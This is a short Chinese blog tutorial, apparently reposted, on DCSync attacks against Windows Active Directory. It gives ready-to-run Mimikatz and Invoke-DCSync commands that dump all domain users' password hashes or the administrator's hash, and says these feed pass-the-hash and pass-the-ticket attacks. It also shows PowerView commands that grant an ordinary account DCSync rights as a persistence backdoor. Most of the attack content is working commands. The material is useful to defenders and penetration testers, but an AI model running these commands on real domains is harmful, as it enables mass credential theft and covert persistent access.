域渗透-DCSync

作者:Zahad003
原文链接:https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html

DCSync是域渗透中经常用到的技术(我在大致学习了以后发现确实如此)

利用条件:

获得以下任一用户的权限:

Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机帐户

Mimikatz实现

导出域内所有用户hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /all /csv" exit
导出指定用户Hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /user:administrator /csv" exit

img

Powershell实现

https://gist.github.com/monoxgas/9d238accd969550136db

我这里面用CS的Powershell-import导入后使用

导出所有用户

Invoke-DCSync -DumpForest | ft -wrap -autosize

img

导出administrator

Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize

img

导出后我们就可以pth,ptt了

利用DCSync权限维持

利用条件
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270

Domain Admins组内的用户
Enterprise Admins组内的用户

看了一下,好像是利用DCSync对普通用户添加ACE,用于修改ACL(Access Conotrol list),让普通用户也有获取到域管理员密码hash的权限

先使用Beacon自带的,powershell-import导入后使用

添加ACE
powershell Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
删除ACE
powershell Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose

效果

img

站在前人的肩膀上!!

EOF[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BYoCkMgT-1645859522662)(http://q2.qlogo.cn/headimg_dl?dst_uin=1941748801&spec=100&t=1634720993174)]本文作者: M1kasa本文链接: https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html关于博主: 评论和私信会在第一时间回复。或者直接私信我。版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角**【[推荐](javascript:void(0)😉】**一下。

标签: 内网渗透/域渗透

推荐该文 关注博主关注博主 收藏本文 分享微博 分享微信

(javascript:void(0))

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值